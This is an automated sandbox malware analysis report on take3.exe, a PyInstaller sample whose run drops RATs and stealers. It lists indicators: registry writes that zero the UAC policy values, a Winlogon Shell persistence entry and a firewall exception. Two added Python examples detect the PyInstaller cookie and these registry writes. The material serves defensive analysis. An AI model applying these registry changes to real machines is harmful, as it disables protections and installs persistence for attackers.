Malware Analysis Report

2025-01-23 11:56

Sample ID 241128-cbebqszndw
Target take3.exe
SHA256 9f9cfe42a0768cc02609fcabf58b8ccce826d5d768e8c6d3a6728f543c4eac53
Tags
ammyyadmin flawedammyy lokibot njrat quasar office04 collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation pyinstaller rat spyware stealer trojan upx
score
10/10


Analysis Overview

score
10/10

SHA256

9f9cfe42a0768cc02609fcabf58b8ccce826d5d768e8c6d3a6728f543c4eac53

Threat Level: Known bad

The file take3.exe was found to be: Known bad. Read the two behavioral runs separately: behavioral1 (Windows 7) only shows take3.exe unpacking its PyInstaller runtime (python311.dll under _MEI29082) with no network activity, while in behavioral2 (Windows 10) the family detections and most signatures are attributed to secondary executables written under C:\Users\Admin\Downloads\UrlHausFiles\ and C:\Program Files (x86)\seetrol\client\ and executed from there. The tags above therefore describe the payloads fetched and run in behavioral2; take3.exe itself is detected statically only as a PyInstaller-packaged, unsigned executable.

Malicious Activity Summary


AmmyyAdmin payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Njrat family

Ammyy Admin

Quasar payload

Modifies WinLogon for persistence

Lokibot family

FlawedAmmyy RAT

Ammyyadmin family

Lokibot

Flawedammyy family

Modifies firewall policy service

UAC bypass

Quasar family

njRAT/Bladabindi

Quasar RAT

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Sets file to hidden

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Uses browser remote debugging

Modifies Windows Firewall

Executes dropped EXE

Checks BIOS information in registry

Identifies Wine through registry keys

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Drops startup file

Reads data files stored by FTP clients

Unsecured Credentials: Credentials In Files

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Accesses Microsoft Outlook profiles

Checks installed software on the system

Checks whether UAC is enabled

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates connected drives

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

UPX packed file

Drops file in Program Files directory

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

Program crash

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Access Token Manipulation: Create Process with Token

Browser Information Discovery

System Location Discovery: System Language Discovery

Detects Pyinstaller

NSIS installer

Views/modifies file attributes

Checks processor information in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

outlook_win_path

Suspicious use of SendNotifyMessage

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Modifies data under HKEY_USERS

System policy modification

Runs ping.exe

Delays execution with timeout.exe

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Suspicious use of WriteProcessMemory

Gathers network information

Opens file in notepad (likely ransom note)

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-28 01:53

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-28 01:53

Reported

2024-11-28 01:56

Platform

win7-20241023-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2908 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2908 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2908 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe

Processes

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI29082\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b
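The static1 signature "Detects Pyinstaller" and the python311.dll dropped under _MEI29082 above both say take3.exe is a PyInstaller-built executable. The way to confirm that from the file itself is to locate the cookie the PyInstaller bootloader appends at the end of its archive and read the Python version and runtime DLL name it records. The Python below is an added example written for this page (not the sandbox's detector, and not derived from take3.exe); build_sample() constructs a synthetic file tail with the same cookie layout so the parser can be exercised offline.

```python
"""Locate the PyInstaller archive cookie and read what it records (Python version,
runtime DLL, archive bounds). Added example, not the sandbox's detector;
build_sample() is a constructed stand-in for a PyInstaller-built PE, not take3.exe."""
import struct
from typing import Optional

MAGIC = b"MEI\014\013\012\013\016"          # 8-byte cookie magic written by the PyInstaller bootloader
COOKIE_FMT = "!8sIIii64s"                  # magic, package length, TOC offset, TOC length, Python version, runtime DLL
COOKIE_LEN = struct.calcsize(COOKIE_FMT)   # 88 bytes (PyInstaller 2.1+ cookie)


def find_pyinstaller_cookie(data: bytes) -> Optional[dict]:
    """Return archive metadata from the trailing cookie, or None if there is none.
    The cookie closes the appended CArchive; anything after it (an Authenticode
    signature, a custom overlay) is tolerated by searching backwards for MAGIC."""
    pos = data.rfind(MAGIC)
    if pos < 0 or pos + COOKIE_LEN > len(data):
        return None
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(COOKIE_FMT, data[pos:pos + COOKIE_LEN])
    # pkg_len covers the whole archive including the cookie, so the archive starts here
    archive_start = pos + COOKIE_LEN - pkg_len
    if archive_start < 0:
        return None
    # Recent bootloaders store e.g. 311 for Python 3.11; older ones store 37 for 3.7
    major, minor = divmod(pyver, 100) if pyver >= 100 else divmod(pyver, 10)
    return {
        "archive_start": archive_start,
        "toc_offset": archive_start + toc_off,   # absolute file offset of the table of contents
        "toc_length": toc_len,
        "python_version": f"{major}.{minor}",
        "python_lib": pylib.rstrip(b"\0").decode("ascii", "replace"),
    }


def build_sample(pyver: int = 311, pylib: bytes = b"python311.dll", trailing: int = 8) -> bytes:
    """Constructed sample: a fake 202-byte header, 100 bytes of 'entries', a 40-byte
    'TOC', the cookie, then `trailing` overlay bytes after the cookie."""
    header = b"MZ" + b"\0" * 200
    entries, toc = b"\x00" * 100, b"T" * 40
    pkg_len = len(entries) + len(toc) + COOKIE_LEN
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(entries), len(toc), pyver, pylib.ljust(64, b"\0"))
    return header + entries + toc + cookie + b"\0" * trailing


if __name__ == "__main__":
    print(find_pyinstaller_cookie(build_sample()))
```

Run it against a real sample with find_pyinstaller_cookie(open(path, "rb").read()); a python_lib of python311.dll would be consistent with the python311.dll extracted in this run. Because the search runs backwards from the end of the file, a trailing signature or other overlay does not hide the cookie, and a file that merely contains the string "MEI" elsewhere is not reported unless a whole cookie fits behind it.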

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-28 01:53

Reported

2024-11-28 01:56

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\Music\\Windows Security Health Host.exe," C:\Windows\SysWOW64\reg.exe N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files (x86)\seetrol\client\SeetrolClient.exe = "C:\\Program Files (x86)\\seetrol\\client\\SeetrolClient.exe:*:Enabled:SeetrolClient" C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4312 created 3488 N/A C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe C:\Windows\Explorer.EXE
This row records Winsvc.exe creating a process whose parent is set to Explorer.EXE rather than to Winsvc.exe itself, i.e. the parent process was supplied explicitly at creation time (parent PID spoofing). A process tree built only from the recorded parent will show the child under Explorer.EXE, so correlate on the creating process, not the nominal parent.

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\system32\reg.exe N/A
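The three write sets above (the Winlogon Shell value under Modifies WinLogon for persistence, the firewall AuthorizedApplications entry under Modifies firewall policy service, and the three UAC policy values under UAC bypass) are what a host-based rule should alert on. The Python below is an added example written for this page, not code from the sandbox or its rule set: it classifies such registry writes and runs over EVENTS, a constructed list that mirrors the reported rows plus two benign writes (a normal explorer.exe Shell value and EnableLUA set back to 1) to show what is not flagged. The svchost.exe image on the benign Shell event is an assumption.

```python
"""Classify registry writes like the ones this report records: the Winlogon Shell
change, the three UAC policy values and the firewall AuthorizedApplications entry.
Added example, not part of the sandbox or its rule set; EVENTS is a constructed list
that mirrors the report's rows (plus two benign writes)."""
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class RegEvent:
    op: str      # "set" (value written) or "create" (key created)
    path: str    # kernel-style path as the sandbox prints it; for "set" the last component is the value name
    data: str    # value data as reported (quotes included), "" for key creation
    image: str   # process that performed the write


# Values under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System whose "0"
# removes a UAC protection. EnableLUA=0 switches UAC off (effective after reboot);
# the other two keep UAC on but remove the consent prompt / secure desktop.
UAC_VALUES = {"enablelua", "consentpromptbehavioradmin", "promptonsecuredesktop"}


def _canon(path: str) -> str:
    """Map \\REGISTRY\\MACHINE and \\REGISTRY\\USER to HKLM / HKU and lower-case."""
    return (path.replace("\\REGISTRY\\MACHINE\\", "HKLM\\")
                .replace("\\REGISTRY\\USER\\", "HKU\\").lower())


def classify(ev: RegEvent) -> Optional[str]:
    """Return a finding name for a suspicious write, or None for anything else."""
    if ev.op != "set":
        return None                      # key creation alone is not actionable here
    full = _canon(ev.path)
    key, _, name = full.rpartition("\\")
    data = ev.data.strip().strip('"')
    if key.endswith("\\windows nt\\currentversion\\winlogon") and name == "shell":
        # Winlogon\Shell runs at every logon; the only expected value is explorer.exe
        if data.lower() != "explorer.exe":
            return "winlogon_shell_persistence"
    if key.endswith("\\policies\\system") and name in UAC_VALUES and data == "0":
        return f"uac_weakened:{name}"
    if "\\firewallpolicy\\" in full and "\\authorizedapplications\\list\\" in full:
        # Legacy firewall exception format: "<image path>:*:Enabled:<display name>"
        if ":*:enabled:" in data.lower():
            return "firewall_exception_added"
    return None


def scan(events: List[RegEvent]) -> List[Tuple[str, str, str]]:
    """Return (finding, image, registry path) for every suspicious write, in event order."""
    return [(f, ev.image, ev.path) for ev in events if (f := classify(ev)) is not None]


def uac_disabled(findings: List[Tuple[str, str, str]]) -> bool:
    """True only when EnableLUA itself was zeroed; the other two values just lower the prompt."""
    return any(f == "uac_weakened:enablelua" for f, _, _ in findings)


POLICY = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
FW_LIST = (r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters"
           r"\FirewallPolicy\StandardProfile\AuthorizedApplications\List")
SHELL = (r"\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000"
         r"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell")

# Constructed to mirror the report's rows; the last two are benign baselines (svchost.exe image assumed).
EVENTS = [
    RegEvent("set", SHELL, r'"explorer.exe,C:\\Users\\Admin\\Music\\Windows Security Health Host.exe,"',
             r"C:\Windows\SysWOW64\reg.exe"),
    RegEvent("set", POLICY + r"\ConsentPromptBehaviorAdmin", '"0"', r"C:\Windows\system32\reg.exe"),
    RegEvent("set", POLICY + r"\EnableLUA", '"0"', r"C:\Windows\system32\reg.exe"),
    RegEvent("set", POLICY + r"\PromptOnSecureDesktop", '"0"', r"C:\Windows\system32\reg.exe"),
    RegEvent("set", FW_LIST + r"\C:\Program Files (x86)\seetrol\client\SeetrolClient.exe",
             r'"C:\\Program Files (x86)\\seetrol\\client\\SeetrolClient.exe:*:Enabled:SeetrolClient"',
             r"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"),
    RegEvent("create", FW_LIST, "", r"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"),
    RegEvent("set", SHELL, '"explorer.exe"', r"C:\Windows\System32\svchost.exe"),
    RegEvent("set", POLICY + r"\EnableLUA", '"1"', r"C:\Windows\system32\reg.exe"),
]

if __name__ == "__main__":
    for finding, image, path in scan(EVENTS):
        print(f"{finding:40} {image}  {path}")
    print("UAC disabled:", uac_disabled(scan(EVENTS)))
```

Only EnableLUA=0 counts as UAC being disabled; ConsentPromptBehaviorAdmin=0 and PromptOnSecureDesktop=0 leave UAC on but auto-approve elevation without a prompt, and all three deserve an alert when reg.exe is the writer. Feeding Sysmon Event ID 13 records into RegEvent needs only a mapping of TargetObject, Details and Image onto path, data and image.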

njRAT/Bladabindi

trojan njrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\file.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe N/A
N/A N/A C:\Users\Admin\Music\Windows Security Health Host.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe N/A
N/A N/A C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\ew.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\file.exe N/A
N/A N/A C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Downloads\UrlHausFiles\client.exe N/A
This particular RunOnce entry (wextract_cleanup0 calling advpack.dll,DelNodeRunDLL32 on the IXP000.TMP directory) is the clean-up hook that the Windows self-extractor used by IExpress packages registers to delete its temporary extraction folder at the next logon. It shows that client.exe is an IExpress-style self-extracting package, not that the payload persists through this key.

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\seetrol\client\Seetrol_Clt.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\STClientChat.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\dtph.tmp C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\Uninstall.cmd C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\068\dfmirage.dll C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\105\x64\dfmirage.dll C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\068\dfmirage.sys C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
